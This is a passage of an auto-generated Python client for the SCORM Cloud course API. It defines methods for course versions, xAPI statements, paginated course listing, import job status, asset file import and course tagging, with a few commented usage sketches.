raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_info`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_version_statements(self, course_id, version_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course Version # noqa: E501
Returns xAPI statements for the course version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_statements(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str learner_id: Only entries for the specified learner id will be included.
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str more: Pagination token returned as `more` property of multi page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_version_statements_with_http_info(course_id, version_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_version_statements_with_http_info(course_id, version_id, **kwargs) # noqa: E501
return data
def get_course_version_statements_with_http_info(self, course_id, version_id, **kwargs): # noqa: E501
"""Get xAPI statements for a Course Version # noqa: E501
Returns xAPI statements for the course version. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_version_statements_with_http_info(course_id, version_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param str learner_id: Only entries for the specified learner id will be included.
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str more: Pagination token returned as `more` property of multi page list requests
:return: XapiStatementResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'learner_id', 'since', 'until', 'more'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_version_statements" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_version_statements`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `get_course_version_statements`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'learner_id' in params:
query_params.append(('learnerId', params['learner_id'])) # noqa: E501
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'more' in params:
query_params.append(('more', params['more'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/xAPIStatements', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='XapiStatementResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_course_versions(self, course_id, **kwargs): # noqa: E501
"""Get a list of a Course's Versions # noqa: E501
Returns information about all versions of the course. This can be useful to see information such as registration counts and modification times across the versions of a course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_versions(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseListNonPagedSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_course_versions_with_http_info(course_id, **kwargs) # noqa: E501
else:
(data) = self.get_course_versions_with_http_info(course_id, **kwargs) # noqa: E501
return data
def get_course_versions_with_http_info(self, course_id, **kwargs): # noqa: E501
"""Get a list of a Course's Versions # noqa: E501
Returns information about all versions of the course. This can be useful to see information such as registration counts and modification times across the versions of a course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_course_versions_with_http_info(course_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param bool include_registration_count: Include the registration count in the results
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:return: CourseListNonPagedSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'since', 'until', 'include_registration_count', 'include_course_metadata'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_course_versions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `get_course_versions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseListNonPagedSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_courses(self, **kwargs): # noqa: E501
"""Get a list of Courses # noqa: E501
        Returns a list of courses. Can be filtered using the request parameters to provide a subset of results. >**Note:** >This request is paginated and will only provide a limited number of resources at a time. If there are more results to be collected, a `more` token is provided with the response, which can be passed to get the next page of results. When passing this token, no other filter parameters can be sent as part of the request. The resources will continue to respect the filters passed in by the original request.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_courses(async_req=True)
>>> result = thread.get()
:param async_req bool
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str datetime_filter: Specifies field that `since` and `until` parameters are applied against
:param list[str] tags: Filter items matching any tag provided (not all)
:param str filter: Optional string which filters results by a specified field (described by filterBy).
:param str filter_by: Optional enum parameter for specifying the field on which to run the filter.
:param str order_by: Optional enum parameter for specifying the field and order by which to sort the results.
:param str more: Pagination token returned as `more` property of multi page list requests
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:param bool include_registration_count: Include the registration count in the results
:return: CourseListSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_courses_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_courses_with_http_info(**kwargs) # noqa: E501
return data
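# The pagination contract in the get_courses docstring (follow the `more`
# token until it is absent, sending no other filters on follow-up calls)
# can be sketched as below. This is a hypothetical illustration: a stub
# stands in for a configured CourseApi, and the `courses`/`more` attribute
# names on the response object are assumptions, not guarantees.
#
# ```python
# class Page(object):
#     def __init__(self, courses, more):
#         self.courses = courses
#         self.more = more
#
# # Stubbed two-page response sequence standing in for the live API.
# _pages = {None: Page(['course-a', 'course-b'], 'token-1'),
#           'token-1': Page(['course-c'], None)}
#
# def fake_get_courses(more=None):
#     return _pages[more]
#
# def list_all_courses(get_courses):
#     """Collect every course by following the `more` token until absent."""
#     all_courses, token = [], None
#     while True:
#         page = get_courses(more=token) if token else get_courses()
#         all_courses.extend(page.courses)
#         token = page.more
#         if not token:  # no further pages
#             return all_courses
#
# courses = list_all_courses(fake_get_courses)
# ```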
def get_courses_with_http_info(self, **kwargs): # noqa: E501
"""Get a list of Courses # noqa: E501
        Returns a list of courses. Can be filtered using the request parameters to provide a subset of results. >**Note:** >This request is paginated and will only provide a limited number of resources at a time. If there are more results to be collected, a `more` token is provided with the response, which can be passed to get the next page of results. When passing this token, no other filter parameters can be sent as part of the request. The resources will continue to respect the filters passed in by the original request.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_courses_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param datetime since: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param datetime until: Filter by ISO 8601 TimeStamp inclusive (defaults to UTC)
:param str datetime_filter: Specifies field that `since` and `until` parameters are applied against
:param list[str] tags: Filter items matching any tag provided (not all)
:param str filter: Optional string which filters results by a specified field (described by filterBy).
:param str filter_by: Optional enum parameter for specifying the field on which to run the filter.
:param str order_by: Optional enum parameter for specifying the field and order by which to sort the results.
:param str more: Pagination token returned as `more` property of multi page list requests
:param bool include_course_metadata: Include course metadata in the results. If the course has no metadata, adding this parameter has no effect.
:param bool include_registration_count: Include the registration count in the results
:return: CourseListSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['since', 'until', 'datetime_filter', 'tags', 'filter', 'filter_by', 'order_by', 'more', 'include_course_metadata', 'include_registration_count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_courses" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'since' in params:
query_params.append(('since', params['since'])) # noqa: E501
if 'until' in params:
query_params.append(('until', params['until'])) # noqa: E501
if 'datetime_filter' in params:
query_params.append(('datetimeFilter', params['datetime_filter'])) # noqa: E501
if 'tags' in params:
query_params.append(('tags', params['tags'])) # noqa: E501
collection_formats['tags'] = 'csv' # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'filter_by' in params:
query_params.append(('filterBy', params['filter_by'])) # noqa: E501
if 'order_by' in params:
query_params.append(('orderBy', params['order_by'])) # noqa: E501
if 'more' in params:
query_params.append(('more', params['more'])) # noqa: E501
if 'include_course_metadata' in params:
query_params.append(('includeCourseMetadata', params['include_course_metadata'])) # noqa: E501
if 'include_registration_count' in params:
query_params.append(('includeRegistrationCount', params['include_registration_count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CourseListSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_import_job_status(self, import_job_id, **kwargs): # noqa: E501
"""Get import job status for a Course # noqa: E501
        Check the status of a course import. This can be called repeatedly to check the progress of a call to any of the import options. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_import_job_status(import_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str import_job_id: Id received when the import job was submitted to the importJobs resource. (required)
:return: ImportJobResultSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_import_job_status_with_http_info(import_job_id, **kwargs) # noqa: E501
else:
(data) = self.get_import_job_status_with_http_info(import_job_id, **kwargs) # noqa: E501
return data
def get_import_job_status_with_http_info(self, import_job_id, **kwargs): # noqa: E501
"""Get import job status for a Course # noqa: E501
        Check the status of a course import. This can be called repeatedly to check the progress of a call to any of the import options. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_import_job_status_with_http_info(import_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str import_job_id: Id received when the import job was submitted to the importJobs resource. (required)
:return: ImportJobResultSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['import_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_import_job_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'import_job_id' is set
if ('import_job_id' not in params or
params['import_job_id'] is None):
raise ValueError("Missing the required parameter `import_job_id` when calling `get_import_job_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'import_job_id' in params:
path_params['importJobId'] = params['import_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/importJobs/{importJobId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ImportJobResultSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
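# The docstring above notes that get_import_job_status can be called
# repeatedly to track progress. A hedged polling sketch follows; the
# status values ('RUNNING', 'COMPLETE') and the lambda standing in for
# CourseApi.get_import_job_status are illustrative assumptions, not the
# documented ImportJobResultSchema contract.
#
# ```python
# import time
#
# def wait_for_import(fetch_status, job_id, interval=0.0, max_polls=50):
#     """Poll the import job until it leaves the RUNNING state."""
#     for _ in range(max_polls):
#         status = fetch_status(job_id)
#         if status != 'RUNNING':
#             return status
#         time.sleep(interval)  # back off between polls against a live API
#     raise RuntimeError('import job %s still running after %d polls'
#                        % (job_id, max_polls))
#
# # Stubbed status sequence standing in for successive API responses.
# _statuses = iter(['RUNNING', 'RUNNING', 'COMPLETE'])
# final = wait_for_import(lambda job_id: next(_statuses), 'job-123')
# ```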
def import_course_asset_file(self, course_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course # noqa: E501
        Creates or updates an asset file in the course, fetched from the provided URL. The file will be downloaded from the URL and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_asset_file(course_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.import_course_asset_file_with_http_info(course_id, asset_schema, **kwargs) # noqa: E501
else:
(data) = self.import_course_asset_file_with_http_info(course_id, asset_schema, **kwargs) # noqa: E501
return data
def import_course_asset_file_with_http_info(self, course_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course # noqa: E501
        Creates or updates an asset file in the course, fetched from the provided URL. The file will be downloaded from the URL and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_asset_file_with_http_info(course_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'asset_schema', 'update_asset_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_course_asset_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `import_course_asset_file`") # noqa: E501
# verify the required parameter 'asset_schema' is set
if ('asset_schema' not in params or
params['asset_schema'] is None):
raise ValueError("Missing the required parameter `asset_schema` when calling `import_course_asset_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
if 'update_asset_policy' in params:
query_params.append(('updateAssetPolicy', params['update_asset_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'asset_schema' in params:
body_params = params['asset_schema']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/asset', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssetFileSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def import_course_version_asset_file(self, course_id, version_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course Version # noqa: E501
Creates or updates an asset file fetched from the provided url into the course version. The file will be downloaded from the url and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_version_asset_file(course_id, version_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.import_course_version_asset_file_with_http_info(course_id, version_id, asset_schema, **kwargs) # noqa: E501
else:
(data) = self.import_course_version_asset_file_with_http_info(course_id, version_id, asset_schema, **kwargs) # noqa: E501
return data
def import_course_version_asset_file_with_http_info(self, course_id, version_id, asset_schema, **kwargs): # noqa: E501
"""Import an asset file for a Course Version # noqa: E501
Creates or updates an asset file fetched from the provided url into the course version. The file will be downloaded from the url and stored in SCORM Cloud. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.import_course_version_asset_file_with_http_info(course_id, version_id, asset_schema, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param ImportAssetRequestSchema asset_schema: (required)
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'asset_schema', 'update_asset_policy'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method import_course_version_asset_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `import_course_version_asset_file`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `import_course_version_asset_file`") # noqa: E501
# verify the required parameter 'asset_schema' is set
if ('asset_schema' not in params or
params['asset_schema'] is None):
raise ValueError("Missing the required parameter `asset_schema` when calling `import_course_version_asset_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
if 'update_asset_policy' in params:
query_params.append(('updateAssetPolicy', params['update_asset_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'asset_schema' in params:
body_params = params['asset_schema']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/asset', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssetFileSchema', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
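# Example (sketch): importing an asset into a specific course version using
# the async pattern and the 'lax' overwrite policy documented above. The
# course id, version number, and schema contents are illustrative only.
#
#   request = ImportAssetRequestSchema()  # populate with the source url per the schema docs
#   thread = api.import_course_version_asset_file(
#       'my_course', 1, request, update_asset_policy='lax', async_req=True)
#   asset_file = thread.get()  # resolves to an AssetFileSchema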
def put_course_tags(self, course_id, tags, **kwargs): # noqa: E501
"""Add tags to a Course # noqa: E501
Applies the provided tags to the course. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags(course_id, tags, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TagListSchema tags: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
else:
(data) = self.put_course_tags_with_http_info(course_id, tags, **kwargs) # noqa: E501
return data
def put_course_tags_with_http_info(self, course_id, tags, **kwargs): # noqa: E501
"""Add tags to a Course # noqa: E501
Applies the provided tags to the course. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags_with_http_info(course_id, tags, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TagListSchema tags: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'tags'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_course_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `put_course_tags`") # noqa: E501
# verify the required parameter 'tags' is set
if ('tags' not in params or
params['tags'] is None):
raise ValueError("Missing the required parameter `tags` when calling `put_course_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'tags' in params:
body_params = params['tags']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/tags', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def put_course_tags_batch(self, batch, **kwargs): # noqa: E501
"""Add a group of tags to a group of Courses # noqa: E501
Applies all of the provided tags on all of the provided courses. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags_batch(batch, async_req=True)
>>> result = thread.get()
:param async_req bool
